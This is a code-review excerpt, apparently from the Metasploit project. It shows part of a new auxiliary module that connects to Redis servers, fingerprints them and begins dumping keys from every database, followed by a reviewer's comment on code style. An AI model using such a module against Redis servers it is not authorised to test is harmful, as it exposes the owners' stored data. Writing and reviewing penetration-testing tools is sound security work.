modules/auxiliary/gather/redis_extractor.rb

```diff
@@ -0,0 +1,186 @@
+    decoded = []
+    x= /\*(?<elements>\S+)\r\n/ =~ data
+    data.slice! "*#{elements}\r\n"
+    while data
+      x = /\$(?<length>\S+)\r/ =~ data
+      data.slice! "$#{length}\r\n"
+      decoded.append(data[0..length.to_i-1])
+      data = data[(length.to_i+2)..-1]
+    end
+    print_error("Error decoding Redis array. Some data may be missing or invalid.") if elements.to_i != decoded.length
+    return decoded
+
+  end
+
+  # Connect to Redis and ensure compatibility.
+  def redis_connect
+    begin
+      connect
+      # Note: Full INFO payload fails occasionally. Using server filter until Redis library can be fixed
+      if (info_data = redis_command('INFO','server')) && /redis_version:(?<redis_version>\S+)/ =~ info_data
+        print_good("Connected to Redis version #{redis_version}")
+      end
+
+      # Some connection attempts such as incorrect password set fail silently in the Redis library.
+      if !info_data
+        print_error("Unable to connect to Redis")
+        print_error("Set verbose true to troubleshoot") if !datastore["VERBOSE"]
+        return
+      end
+
+      # Ensure version compatability
+      if (Gem::Version.new(redis_version) < Gem::Version.new(MIN_REDIS_VERSION))
+        print_status("Module supports Redis #{MIN_REDIS_VERSION} or higher.")
+        return
+      end
+
+      # Connection was sucessful
+      return info_data
+
+    rescue Msf::Auxiliary::Failed => e
+      # This error trips when auth is required but password not set
+      print_error("Unable to connect to Redis: " + e.message)
+      return
+
+    rescue Rex::ConnectionTimeout
+      print_error("Timed out trying to connect to Redis")
+      return
+
+    rescue
+      print_error("Unknown error trying to connect to Redis")
+      return
+    end
+  end
+
+  def check_host(ip)
+    info_data=redis_connect
+    if(info_data)
+      if /os:(?<os_ver>.*)/ =~ info_data
+        print_status("OS is #{os_ver} ")
+      end
+
+      if /keys=(?<keys>\S+),expires=/ =~ info_data
+        print_status("Redis reports #{keys} keys stored")
+      end
+
+      if /used_memory_peak_human:(?<bytes>.*)/ =~ info_data
+        print_status("#{bytes.chomp} bytes stored")
+      end
+    end
+    disconnect
+    return info_data ? Msf::Exploit::CheckCode::Appears : Msf::Exploit::CheckCode::Unknown
+  end
+
+  def get_keyspace
+    ks = redis_command('INFO','keyspace')
+    ks = ks.split("\n")[2..-1]
+    result = []
+    ks.each do |k|
+      if /db(?<db>\S+):/ =~ k && /keys=(?<keys>\S+),expires/ =~ k
+        result.append([db,keys])
+      end
+    end
+    return result
+  end
+
+  def run_host(ip)
+    if(!redis_connect)
+      disconnect
+      return
+    end
+
+    keyspace = get_keyspace
+    keyspace.each do |space|
+      print_status("Extracting about #{space[1]} keys from databaase #{space[0]}")
+      redis_command('SELECT',space[0])
+      @kv=[]
+      scan("0")
+
+      if(@kv.length == 0)
+        print_status("No keys returned")
```

Comment:
You could use `next` here as a guard, rather than wrap the remainder of the method inside a conditional branch.